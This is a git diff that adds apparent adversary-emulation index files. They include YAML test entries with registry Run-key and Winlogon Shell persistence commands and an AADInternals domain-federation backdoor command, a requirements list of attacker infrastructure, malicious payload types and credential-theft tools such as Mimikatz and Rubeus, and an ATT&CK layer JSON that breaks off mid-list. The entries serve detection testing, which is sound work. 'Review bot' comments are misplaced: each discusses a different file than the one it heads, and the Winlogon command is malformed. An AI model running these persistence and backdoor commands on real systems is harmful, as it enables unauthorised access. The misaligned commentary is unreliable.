diff --git a/ot-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml b/ot-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml
new file mode 100644
index 0000000..e7228e9
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml
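Review bot: Event ID 4697 depends on the `Audit Security System Extension` subcategory, which is not enabled by default, whereas the System log's Event ID 7045 (`A service was installed in the system`, source Service Control Manager) is written regardless of audit policy and is the more dependable source for this test; suggest the detect item read `Use service creation events (Security Event ID 4697 with Security System Extension auditing enabled, or System Event ID 7045) to identify newly created services ...`. The guidance should also note that `sc create` requires local administrator rights, so the expected outcome differs when the test principal is unprivileged, and that `binPath=` needs a space after the equals sign exactly as written or `sc` silently misparses the argument.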
@@ -0,0 +1,20 @@
+name: Persist via Registry "Run" key
+description: Run a payload during user login and startup by setting a registry run key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+ tid: T1547.001
+ tactic: TA0003
+ x_vectr_id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+ isv: 1
diff --git a/ot-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml b/ot-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
new file mode 100644
index 0000000..a323aaa
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
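Review bot: The detect item cites Event ID 4656 for registry modifications, but 4656 only records that a handle to the key was requested and fires on reads as well, which makes it very noisy for a Run-key detection; the event that records the write is 4657 (`A registry value was modified`), with 4663 for the access itself. Suggest `... Trigger an alert on Event ID 4657 (registry value modified) for the Run/RunOnce keys using object access logs`. Also `modification are made the Registry` should read `modifications are made to the Registry`. Since this entry writes under HKCU it needs no elevation, which is worth stating so the result is not confused with the HKLM Winlogon variant.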
@@ -0,0 +1,20 @@
+name: Persist via Registry Winlogon Shell
+description: Run a payload during user login by setting a Registry Winlogon key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+ tid: T1547.004
+ tactic: TA0003
+ x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+ isv: 1
diff --git a/ot-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml b/ot-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
new file mode 100644
index 0000000..0a122f8
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
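Review bot: The guidance `reg add "HKLM\...\Winlogon" /v Shell /f "{{ command }}"` is not valid `reg add` syntax: the value data must be passed with `/d`, so the command as written errors out and the test never modifies the key; suggest `- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe, {{ command }}" /f`. Keeping `explorer.exe,` in front of the payload matters operationally: replacing the value outright leaves every user on the test host without a desktop at the next logon. As with the Run-key entry, the write is recorded by Event ID 4657 rather than the handle-request event 4656 named in the detect item, and because this key is under HKLM the test requires administrative rights, which should be stated.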
@@ -0,0 +1,23 @@
+name: Configure a custom federated domain
+description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+platforms:
+- azuread
+guidance:
+- PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+block:
+- ''
+detect:
+- Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+- https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+controls:
+- SIEM
+metadata:
+ id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+ tid: T1484.002
+ tactic: TA0003
+ x_tools:
+ - AADInternals
+ x_references:
+ - https://o365blog.com/post/aadbackdoor/
+ x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+ isv: 1
diff --git a/rh-index-2024/CHANGELOG.md b/rh-index-2024/CHANGELOG.md
new file mode 100644
index 0000000..b5315fa
--- /dev/null
+++ b/rh-index-2024/CHANGELOG.md
@@ -0,0 +1,4 @@
+# v1.0 (January 2024)
+
+- Initial release
+
diff --git a/rh-index-2024/REQUIREMENTS.md b/rh-index-2024/REQUIREMENTS.md
new file mode 100644
index 0000000..c04501a
--- /dev/null
+++ b/rh-index-2024/REQUIREMENTS.md
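Review bot: `block:` holds a single empty-string item (`- ''`) rather than an explicit statement, so any consumer that renders or counts blocking controls will show a blank entry for this technique; if the intent is that no preventive control is assessed, say so in words, e.g. `- No preventive control assessed; federation changes are limited to privileged tenant roles`, or use an empty list consistently with the other index files. The first `detect` entry misspells "SIEM" as "SEIM", and its second entry is a bare URL while the attack reference lives under `x_references`; moving the detection link into `x_references` (or labelling it) keeps the two lists parallel. As far as I recall, ATT&CK lists T1484.002 under Defense Evasion and Privilege Escalation rather than Persistence, so `tactic: TA0003` is an off-matrix mapping; confirm the index tooling accepts that before release.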
@@ -0,0 +1,37 @@
+# Infrastructure
+
+- Mail server/relay to send emails
+- Proxy/VPN
+- Proxy/VPN in non-standard geolocation
+- HTTP/S file hosting server
+- Command-and-control server(s) with HTTPS and HTTP channels
+- Accounts for : Cloud storage provider (exfil), remote assistance service (if applicable)
+- Domain(s) and certificate(s) for infrastructure
+
+## Payloads
+
+|#|Test Case|Payload|Notes|
+|---|---|---|---|
+|1|Attachment - ISO|ISO||
+|2|Attachment - Zipped Macro|Macro-enabled Office document in zip||
+|3|Macro - Remote Template|Office document that loads remotely-hosted macro-enabled template||
+|4|DLL execution using Rundll32|DLL||
+|5|Sideload a DLL into a legitimate application|DLL|can be shared with #4 as long as exported functions are as expected|
+|6|Load known-abusable kernel driver|Windows driver|refer to notebook for example drivers + hashes|
+|7|Register Security Service Provider (SSP) in LSASS|SSP DLL|refer to notebook for instructions on creating DLL|
+|8||Sensitive data|Use dlptest.com for sample data|
+
+
+# Tools/Scripts
+
+- Remote assistance tool such as TeamViewer, GoTo, or AnyConnect
+- Net Scan : https://www.softperfect.com/products/networkscanner/
+- SharpHound : https://github.com/BloodHoundAD/SharpHound
+- ProcDump : https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+- Mimikatz : https://github.com/gentilkiwi/mimikatz
+- SharpDPAPI : https://github.com/GhostPack/SharpDPAPI
+- Rubeus : https://github.com/GhostPack/Rubeus
+- Nanodump : https://github.com/fortra/nanodump
+- File encryptor : https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+- AADInternals : https://github.com/Gerenios/AADInternals
+
diff --git a/rh-index-2024/rh-index-2024-v1.0-layer.json b/rh-index-2024/rh-index-2024-v1.0-layer.json
new file mode 100644
index 0000000..00b103b
--- /dev/null
+++ b/rh-index-2024/rh-index-2024-v1.0-layer.json
@@ -0,0 +1,3156 @@ +{ + "description": "Retail and Hospitality Threat Simulation Index 2024 v1.0", + "domain": "enterprise-attack", + "layout": { + "layout": "flat" + }, + "name": "Retail and Hospitality Threat Simulation Index 2024 v1.0", + "selectSubtechniquesWithParent": false, + "selectTechniquesAcrossTactics": false, + "techniques": [ + { + "enabled": false, + "techniqueID": "T1001" + }, + { + "enabled": false, + "techniqueID": "T1001.001" + }, + { + "enabled": false, + "techniqueID": "T1001.002" + }, + { + "enabled": false, + "techniqueID": "T1001.003" + }, + { + "enabled": false, + "techniqueID": "T1002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "enabled": false, + "techniqueID": "T1003.002" + }, + { + "enabled": false, + "techniqueID": "T1003.003" + }, + { + "enabled": false, + "techniqueID": "T1003.004" + }, + { + "enabled": false, + "techniqueID": "T1003.005" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.006" + }, + { + "enabled": false, + "techniqueID": "T1003.007" + }, + { + "enabled": false, + "techniqueID": "T1003.008" + }, + { + "enabled": false, + "techniqueID": "T1004" + }, + { + "enabled": false, + "techniqueID": "T1005" + }, + { + "enabled": false, + "techniqueID": "T1006" + }, + { + "enabled": false, + "techniqueID": "T1007" + }, + { + "enabled": false, + "techniqueID": "T1008" + }, + { + "enabled": false, + "techniqueID": "T1009" + }, + { + "enabled": false, + "techniqueID": "T1010" + }, + { + "enabled": false, + "techniqueID": "T1011" + }, + { + "enabled": false, + "techniqueID": "T1011.001" + }, + { + "enabled": false, + "techniqueID": 
"T1012" + }, + { + "enabled": false, + "techniqueID": "T1013" + }, + { + "color": "#7a34eb", + "techniqueID": "T1014" + }, + { + "enabled": false, + "techniqueID": "T1015" + }, + { + "enabled": false, + "techniqueID": "T1016" + }, + { + "enabled": false, + "techniqueID": "T1016.001" + }, + { + "enabled": false, + "techniqueID": "T1016.002" + }, + { + "enabled": false, + "techniqueID": "T1017" + }, + { + "color": "#7a34eb", + "techniqueID": "T1018" + }, + { + "enabled": false, + "techniqueID": "T1019" + }, + { + "enabled": false, + "techniqueID": "T1020" + }, + { + "enabled": false, + "techniqueID": "T1020.001" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.003" + }, + { + "enabled": false, + "techniqueID": "T1021.004" + }, + { + "enabled": false, + "techniqueID": "T1021.005" + }, + { + "enabled": false, + "techniqueID": "T1021.006" + }, + { + "enabled": false, + "techniqueID": "T1021.007" + }, + { + "enabled": false, + "techniqueID": "T1021.008" + }, + { + "enabled": false, + "techniqueID": "T1022" + }, + { + "enabled": false, + "techniqueID": "T1023" + }, + { + "enabled": false, + "techniqueID": "T1024" + }, + { + "enabled": false, + "techniqueID": "T1025" + }, + { + "enabled": false, + "techniqueID": "T1026" + }, + { + "enabled": false, + "techniqueID": "T1027" + }, + { + "enabled": false, + "techniqueID": "T1027.001" + }, + { + "enabled": false, + "techniqueID": "T1027.002" + }, + { + "enabled": false, + "techniqueID": "T1027.003" + }, + { + "enabled": false, + "techniqueID": "T1027.004" + }, + { + "enabled": false, + "techniqueID": "T1027.005" + }, + { + "enabled": false, + "techniqueID": "T1027.006" + }, + { + "enabled": false, + "techniqueID": 
"T1027.007" + }, + { + "enabled": false, + "techniqueID": "T1027.008" + }, + { + "enabled": false, + "techniqueID": "T1027.009" + }, + { + "enabled": false, + "techniqueID": "T1027.010" + }, + { + "enabled": false, + "techniqueID": "T1027.011" + }, + { + "enabled": false, + "techniqueID": "T1027.012" + }, + { + "enabled": false, + "techniqueID": "T1028" + }, + { + "enabled": false, + "techniqueID": "T1029" + }, + { + "enabled": false, + "techniqueID": "T1030" + }, + { + "enabled": false, + "techniqueID": "T1031" + }, + { + "enabled": false, + "techniqueID": "T1032" + }, + { + "enabled": false, + "techniqueID": "T1033" + }, + { + "enabled": false, + "techniqueID": "T1034" + }, + { + "enabled": false, + "techniqueID": "T1035" + }, + { + "enabled": false, + "techniqueID": "T1036" + }, + { + "enabled": false, + "techniqueID": "T1036.001" + }, + { + "enabled": false, + "techniqueID": "T1036.002" + }, + { + "enabled": false, + "techniqueID": "T1036.003" + }, + { + "enabled": false, + "techniqueID": "T1036.004" + }, + { + "enabled": false, + "techniqueID": "T1036.005" + }, + { + "enabled": false, + "techniqueID": "T1036.006" + }, + { + "enabled": false, + "techniqueID": "T1036.007" + }, + { + "enabled": false, + "techniqueID": "T1036.008" + }, + { + "enabled": false, + "techniqueID": "T1036.009" + }, + { + "enabled": false, + "techniqueID": "T1037" + }, + { + "enabled": false, + "techniqueID": "T1037.001" + }, + { + "enabled": false, + "techniqueID": "T1037.002" + }, + { + "enabled": false, + "techniqueID": "T1037.003" + }, + { + "enabled": false, + "techniqueID": "T1037.004" + }, + { + "enabled": false, + "techniqueID": "T1037.005" + }, + { + "enabled": false, + "techniqueID": "T1038" + }, + { + "enabled": false, + "techniqueID": "T1039" + }, + { + "enabled": false, + "techniqueID": "T1040" + }, + { + "color": "#7a34eb", + "techniqueID": "T1041" + }, + { + "enabled": false, + "techniqueID": "T1042" + }, + { + "enabled": false, + "techniqueID": "T1043" + }, + { + 
"enabled": false, + "techniqueID": "T1044" + }, + { + "enabled": false, + "techniqueID": "T1045" + }, + { + "color": "#7a34eb", + "techniqueID": "T1046" + }, + { + "enabled": false, + "techniqueID": "T1047" + }, + { + "showSubtechniques": true, + "techniqueID": "T1048" + }, + { + "showSubtechniques": true, + "techniqueID": "T1048" + }, + { + "enabled": false, + "techniqueID": "T1048.001" + }, + { + "enabled": false, + "techniqueID": "T1048.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1048.003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1048.003" + }, + { + "enabled": false, + "techniqueID": "T1049" + }, + { + "enabled": false, + "techniqueID": "T1050" + }, + { + "enabled": false, + "techniqueID": "T1051" + }, + { + "enabled": false, + "techniqueID": "T1052" + }, + { + "enabled": false, + "techniqueID": "T1052.001" + }, + { + "showSubtechniques": true, + "techniqueID": "T1053" + }, + { + "enabled": false, + "techniqueID": "T1053.001" + }, + { + "enabled": false, + "techniqueID": "T1053.002" + }, + { + "enabled": false, + "techniqueID": "T1053.003" + }, + { + "enabled": false, + "techniqueID": "T1053.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1053.005" + }, + { + "enabled": false, + "techniqueID": "T1053.006" + }, + { + "enabled": false, + "techniqueID": "T1053.007" + }, + { + "enabled": false, + "techniqueID": "T1054" + }, + { + "enabled": false, + "techniqueID": "T1055" + }, + { + "enabled": false, + "techniqueID": "T1055.001" + }, + { + "enabled": false, + "techniqueID": "T1055.002" + }, + { + "enabled": false, + "techniqueID": "T1055.003" + }, + { + "enabled": false, + "techniqueID": "T1055.004" + }, + { + "enabled": false, + "techniqueID": "T1055.005" + }, + { + "enabled": false, + "techniqueID": "T1055.008" + }, + { + "enabled": false, + "techniqueID": "T1055.009" + }, + { + "enabled": false, + "techniqueID": "T1055.011" + }, + { + "enabled": false, + "techniqueID": "T1055.012" + }, + { + "enabled": false, + "techniqueID": 
"T1055.013" + }, + { + "enabled": false, + "techniqueID": "T1055.014" + }, + { + "enabled": false, + "techniqueID": "T1055.015" + }, + { + "showSubtechniques": true, + "techniqueID": "T1056" + }, + { + "color": "#7a34eb", + "techniqueID": "T1056.001" + }, + { + "enabled": false, + "techniqueID": "T1056.002" + }, + { + "enabled": false, + "techniqueID": "T1056.003" + }, + { + "enabled": false, + "techniqueID": "T1056.004" + }, + { + "enabled": false, + "techniqueID": "T1057" + }, + { + "enabled": false, + "techniqueID": "T1058" + }, + { + "enabled": false, + "techniqueID": "T1059" + }, + { + "enabled": false, + "techniqueID": "T1059.001" + }, + { + "enabled": false, + "techniqueID": "T1059.002" + }, + { + "enabled": false, + "techniqueID": "T1059.003" + }, + { + "enabled": false, + "techniqueID": "T1059.004" + }, + { + "enabled": false, + "techniqueID": "T1059.005" + }, + { + "enabled": false, + "techniqueID": "T1059.006" + }, + { + "enabled": false, + "techniqueID": "T1059.007" + }, + { + "enabled": false, + "techniqueID": "T1059.008" + }, + { + "enabled": false, + "techniqueID": "T1059.009" + }, + { + "enabled": false, + "techniqueID": "T1060" + }, + { + "enabled": false, + "techniqueID": "T1061" + }, + { + "enabled": false, + "techniqueID": "T1062" + }, + { + "enabled": false, + "techniqueID": "T1063" + }, + { + "enabled": false, + "techniqueID": "T1064" + }, + { + "enabled": false, + "techniqueID": "T1065" + }, + { + "enabled": false, + "techniqueID": "T1066" + }, + { + "enabled": false, + "techniqueID": "T1067" + }, + { + "enabled": false, + "techniqueID": "T1068" + }, + { + "enabled": false, + "techniqueID": "T1069" + }, + { + "enabled": false, + "techniqueID": "T1069.001" + }, + { + "enabled": false, + "techniqueID": "T1069.002" + }, + { + "enabled": false, + "techniqueID": "T1069.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1070" + }, + { + "color": "#7a34eb", + "techniqueID": "T1070.001" + }, + { + "enabled": false, + "techniqueID": 
"T1070.002" + }, + { + "enabled": false, + "techniqueID": "T1070.003" + }, + { + "enabled": false, + "techniqueID": "T1070.004" + }, + { + "enabled": false, + "techniqueID": "T1070.005" + }, + { + "enabled": false, + "techniqueID": "T1070.006" + }, + { + "enabled": false, + "techniqueID": "T1070.007" + }, + { + "enabled": false, + "techniqueID": "T1070.008" + }, + { + "enabled": false, + "techniqueID": "T1070.009" + }, + { + "showSubtechniques": true, + "techniqueID": "T1071" + }, + { + "showSubtechniques": true, + "techniqueID": "T1071" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071.001" + }, + { + "enabled": false, + "techniqueID": "T1071.002" + }, + { + "enabled": false, + "techniqueID": "T1071.003" + }, + { + "enabled": false, + "techniqueID": "T1071.004" + }, + { + "enabled": false, + "techniqueID": "T1072" + }, + { + "enabled": false, + "techniqueID": "T1073" + }, + { + "enabled": false, + "techniqueID": "T1074" + }, + { + "enabled": false, + "techniqueID": "T1074.001" + }, + { + "enabled": false, + "techniqueID": "T1074.002" + }, + { + "enabled": false, + "techniqueID": "T1075" + }, + { + "enabled": false, + "techniqueID": "T1076" + }, + { + "enabled": false, + "techniqueID": "T1077" + }, + { + "color": "#7a34eb", + "techniqueID": "T1078" + }, + { + "color": "#7a34eb", + "techniqueID": "T1078" + }, + { + "enabled": false, + "techniqueID": "T1078.001" + }, + { + "enabled": false, + "techniqueID": "T1078.002" + }, + { + "enabled": false, + "techniqueID": "T1078.003" + }, + { + "enabled": false, + "techniqueID": "T1078.004" + }, + { + "enabled": false, + "techniqueID": "T1079" + }, + { + "enabled": false, + "techniqueID": "T1080" + }, + { + "enabled": false, + "techniqueID": "T1081" + }, + { + "color": "#7a34eb", + "techniqueID": "T1082" + }, + { + "enabled": false, + "techniqueID": "T1083" + }, + { + "enabled": false, + "techniqueID": "T1084" + }, + { + "enabled": false, + "techniqueID": 
"T1085" + }, + { + "enabled": false, + "techniqueID": "T1086" + }, + { + "showSubtechniques": true, + "techniqueID": "T1087" + }, + { + "showSubtechniques": true, + "techniqueID": "T1087" + }, + { + "enabled": false, + "techniqueID": "T1087.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1087.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1087.002" + }, + { + "enabled": false, + "techniqueID": "T1087.003" + }, + { + "enabled": false, + "techniqueID": "T1087.004" + }, + { + "enabled": false, + "techniqueID": "T1088" + }, + { + "enabled": false, + "techniqueID": "T1089" + }, + { + "enabled": false, + "techniqueID": "T1090" + }, + { + "enabled": false, + "techniqueID": "T1090.001" + }, + { + "enabled": false, + "techniqueID": "T1090.002" + }, + { + "enabled": false, + "techniqueID": "T1090.003" + }, + { + "enabled": false, + "techniqueID": "T1090.004" + }, + { + "enabled": false, + "techniqueID": "T1091" + }, + { + "enabled": false, + "techniqueID": "T1092" + }, + { + "enabled": false, + "techniqueID": "T1093" + }, + { + "enabled": false, + "techniqueID": "T1094" + }, + { + "enabled": false, + "techniqueID": "T1095" + }, + { + "enabled": false, + "techniqueID": "T1096" + }, + { + "enabled": false, + "techniqueID": "T1097" + }, + { + "showSubtechniques": true, + "techniqueID": "T1098" + }, + { + "enabled": false, + "techniqueID": "T1098.001" + }, + { + "enabled": false, + "techniqueID": "T1098.002" + }, + { + "enabled": false, + "techniqueID": "T1098.003" + }, + { + "enabled": false, + "techniqueID": "T1098.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1098.005" + }, + { + "enabled": false, + "techniqueID": "T1098.006" + }, + { + "enabled": false, + "techniqueID": "T1099" + }, + { + "enabled": false, + "techniqueID": "T1100" + }, + { + "enabled": false, + "techniqueID": "T1101" + }, + { + "enabled": false, + "techniqueID": "T1102" + }, + { + "enabled": false, + "techniqueID": "T1102.001" + }, + { + "enabled": false, + "techniqueID": "T1102.002" 
+ }, + { + "enabled": false, + "techniqueID": "T1102.003" + }, + { + "enabled": false, + "techniqueID": "T1103" + }, + { + "enabled": false, + "techniqueID": "T1104" + }, + { + "color": "#7a34eb", + "techniqueID": "T1105" + }, + { + "enabled": false, + "techniqueID": "T1106" + }, + { + "enabled": false, + "techniqueID": "T1107" + }, + { + "enabled": false, + "techniqueID": "T1108" + }, + { + "enabled": false, + "techniqueID": "T1109" + }, + { + "enabled": false, + "techniqueID": "T1110" + }, + { + "enabled": false, + "techniqueID": "T1110.001" + }, + { + "enabled": false, + "techniqueID": "T1110.002" + }, + { + "enabled": false, + "techniqueID": "T1110.003" + }, + { + "enabled": false, + "techniqueID": "T1110.004" + }, + { + "enabled": false, + "techniqueID": "T1111" + }, + { + "color": "#7a34eb", + "techniqueID": "T1112" + }, + { + "color": "#7a34eb", + "techniqueID": "T1113" + }, + { + "enabled": false, + "techniqueID": "T1114" + }, + { + "enabled": false, + "techniqueID": "T1114.001" + }, + { + "enabled": false, + "techniqueID": "T1114.002" + }, + { + "enabled": false, + "techniqueID": "T1114.003" + }, + { + "enabled": false, + "techniqueID": "T1115" + }, + { + "enabled": false, + "techniqueID": "T1116" + }, + { + "enabled": false, + "techniqueID": "T1117" + }, + { + "enabled": false, + "techniqueID": "T1118" + }, + { + "enabled": false, + "techniqueID": "T1119" + }, + { + "enabled": false, + "techniqueID": "T1120" + }, + { + "enabled": false, + "techniqueID": "T1121" + }, + { + "enabled": false, + "techniqueID": "T1122" + }, + { + "enabled": false, + "techniqueID": "T1123" + }, + { + "enabled": false, + "techniqueID": "T1124" + }, + { + "enabled": false, + "techniqueID": "T1125" + }, + { + "enabled": false, + "techniqueID": "T1126" + }, + { + "enabled": false, + "techniqueID": "T1127" + }, + { + "enabled": false, + "techniqueID": "T1127.001" + }, + { + "enabled": false, + "techniqueID": "T1128" + }, + { + "enabled": false, + "techniqueID": "T1129" + }, + { + 
"enabled": false, + "techniqueID": "T1130" + }, + { + "enabled": false, + "techniqueID": "T1131" + }, + { + "enabled": false, + "techniqueID": "T1132" + }, + { + "enabled": false, + "techniqueID": "T1132.001" + }, + { + "enabled": false, + "techniqueID": "T1132.002" + }, + { + "enabled": false, + "techniqueID": "T1133" + }, + { + "enabled": false, + "techniqueID": "T1134" + }, + { + "enabled": false, + "techniqueID": "T1134.001" + }, + { + "enabled": false, + "techniqueID": "T1134.002" + }, + { + "enabled": false, + "techniqueID": "T1134.003" + }, + { + "enabled": false, + "techniqueID": "T1134.004" + }, + { + "enabled": false, + "techniqueID": "T1134.005" + }, + { + "enabled": false, + "techniqueID": "T1135" + }, + { + "showSubtechniques": true, + "techniqueID": "T1136" + }, + { + "color": "#7a34eb", + "techniqueID": "T1136.001" + }, + { + "enabled": false, + "techniqueID": "T1136.002" + }, + { + "enabled": false, + "techniqueID": "T1136.003" + }, + { + "enabled": false, + "techniqueID": "T1137" + }, + { + "enabled": false, + "techniqueID": "T1137.001" + }, + { + "enabled": false, + "techniqueID": "T1137.002" + }, + { + "enabled": false, + "techniqueID": "T1137.003" + }, + { + "enabled": false, + "techniqueID": "T1137.004" + }, + { + "enabled": false, + "techniqueID": "T1137.005" + }, + { + "enabled": false, + "techniqueID": "T1137.006" + }, + { + "enabled": false, + "techniqueID": "T1138" + }, + { + "enabled": false, + "techniqueID": "T1139" + }, + { + "color": "#7a34eb", + "techniqueID": "T1140" + }, + { + "enabled": false, + "techniqueID": "T1141" + }, + { + "enabled": false, + "techniqueID": "T1142" + }, + { + "enabled": false, + "techniqueID": "T1143" + }, + { + "enabled": false, + "techniqueID": "T1144" + }, + { + "enabled": false, + "techniqueID": "T1145" + }, + { + "enabled": false, + "techniqueID": "T1146" + }, + { + "enabled": false, + "techniqueID": "T1147" + }, + { + "enabled": false, + "techniqueID": "T1148" + }, + { + "enabled": false, + 
"techniqueID": "T1149" + }, + { + "enabled": false, + "techniqueID": "T1150" + }, + { + "enabled": false, + "techniqueID": "T1151" + }, + { + "enabled": false, + "techniqueID": "T1152" + }, + { + "enabled": false, + "techniqueID": "T1153" + }, + { + "enabled": false, + "techniqueID": "T1154" + }, + { + "enabled": false, + "techniqueID": "T1155" + }, + { + "enabled": false, + "techniqueID": "T1156" + }, + { + "enabled": false, + "techniqueID": "T1157" + }, + { + "enabled": false, + "techniqueID": "T1158" + }, + { + "enabled": false, + "techniqueID": "T1159" + }, + { + "enabled": false, + "techniqueID": "T1160" + }, + { + "enabled": false, + "techniqueID": "T1161" + }, + { + "enabled": false, + "techniqueID": "T1162" + }, + { + "enabled": false, + "techniqueID": "T1163" + }, + { + "enabled": false, + "techniqueID": "T1164" + }, + { + "enabled": false, + "techniqueID": "T1165" + }, + { + "enabled": false, + "techniqueID": "T1166" + }, + { + "enabled": false, + "techniqueID": "T1167" + }, + { + "enabled": false, + "techniqueID": "T1168" + }, + { + "enabled": false, + "techniqueID": "T1169" + }, + { + "enabled": false, + "techniqueID": "T1170" + }, + { + "enabled": false, + "techniqueID": "T1171" + }, + { + "enabled": false, + "techniqueID": "T1172" + }, + { + "enabled": false, + "techniqueID": "T1173" + }, + { + "enabled": false, + "techniqueID": "T1174" + }, + { + "enabled": false, + "techniqueID": "T1175" + }, + { + "enabled": false, + "techniqueID": "T1176" + }, + { + "enabled": false, + "techniqueID": "T1177" + }, + { + "enabled": false, + "techniqueID": "T1178" + }, + { + "enabled": false, + "techniqueID": "T1179" + }, + { + "enabled": false, + "techniqueID": "T1180" + }, + { + "enabled": false, + "techniqueID": "T1181" + }, + { + "enabled": false, + "techniqueID": "T1182" + }, + { + "enabled": false, + "techniqueID": "T1183" + }, + { + "enabled": false, + "techniqueID": "T1184" + }, + { + "enabled": false, + "techniqueID": "T1185" + }, + { + "enabled": false, + 
"techniqueID": "T1186" + }, + { + "enabled": false, + "techniqueID": "T1187" + }, + { + "enabled": false, + "techniqueID": "T1188" + }, + { + "enabled": false, + "techniqueID": "T1189" + }, + { + "enabled": false, + "techniqueID": "T1190" + }, + { + "enabled": false, + "techniqueID": "T1191" + }, + { + "enabled": false, + "techniqueID": "T1192" + }, + { + "enabled": false, + "techniqueID": "T1193" + }, + { + "enabled": false, + "techniqueID": "T1194" + }, + { + "enabled": false, + "techniqueID": "T1195" + }, + { + "enabled": false, + "techniqueID": "T1195.001" + }, + { + "enabled": false, + "techniqueID": "T1195.002" + }, + { + "enabled": false, + "techniqueID": "T1195.003" + }, + { + "enabled": false, + "techniqueID": "T1196" + }, + { + "enabled": false, + "techniqueID": "T1197" + }, + { + "enabled": false, + "techniqueID": "T1198" + }, + { + "enabled": false, + "techniqueID": "T1199" + }, + { + "enabled": false, + "techniqueID": "T1200" + }, + { + "enabled": false, + "techniqueID": "T1201" + }, + { + "enabled": false, + "techniqueID": "T1202" + }, + { + "enabled": false, + "techniqueID": "T1203" + }, + { + "enabled": false, + "techniqueID": "T1204" + }, + { + "enabled": false, + "techniqueID": "T1204.001" + }, + { + "enabled": false, + "techniqueID": "T1204.002" + }, + { + "enabled": false, + "techniqueID": "T1204.003" + }, + { + "enabled": false, + "techniqueID": "T1205" + }, + { + "enabled": false, + "techniqueID": "T1205.001" + }, + { + "enabled": false, + "techniqueID": "T1205.002" + }, + { + "enabled": false, + "techniqueID": "T1206" + }, + { + "enabled": false, + "techniqueID": "T1207" + }, + { + "enabled": false, + "techniqueID": "T1208" + }, + { + "enabled": false, + "techniqueID": "T1209" + }, + { + "enabled": false, + "techniqueID": "T1210" + }, + { + "enabled": false, + "techniqueID": "T1211" + }, + { + "enabled": false, + "techniqueID": "T1212" + }, + { + "enabled": false, + "techniqueID": "T1213" + }, + { + "enabled": false, + "techniqueID": 
